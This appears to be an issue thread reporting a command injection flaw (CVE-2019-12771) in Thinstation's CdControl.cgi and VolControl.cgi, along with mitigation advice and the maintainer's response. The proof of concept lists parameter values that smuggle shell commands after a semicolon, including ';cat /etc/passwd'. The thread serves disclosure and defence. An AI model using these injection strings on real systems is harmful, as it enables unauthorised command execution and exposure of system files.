CGI Generic Command Execution

[ghost]

The following resources are vulnerable to arbitrary command execution on Thinstation in /cgi-bin/CdControl.cgi and /cgi-bin/VolControl.cgi.

PoC:
/cgi-bin/CdControl.cgi:

action=;id
eject;ifconfig
back;ls -alt
forward;whoami
pause;hostname

/cgi-bin/VolControl.cgi:

OK=;cat /etc/passwd

Please patch asap. Does affect latest version.

For more information read: https://www.owasp.org/index.php/Command_Injection

[Thinstation]

You have a recommendation?

[ghost]

-Avoid calling OS commands directly.
-Validate user input against a whitelist of permitted values.
-For more information, refer to:
https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.md

[Thinstation]

The webserver has very limited system privileges. Common attacks like rt'ing the passwd file can be mitigated by locking the password, and only allowing a single auto-login.

[ghost]

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12771
https://nvd.nist.gov/vuln/detail/CVE-2019-12771#VulnChangeHistorySection

[Thinstation]

Notice to users. Don’t include the www package in your build if your end points might contain sensitive information accessible from an unprivileged user. It’s kind of a No-duh, but now it’s documented.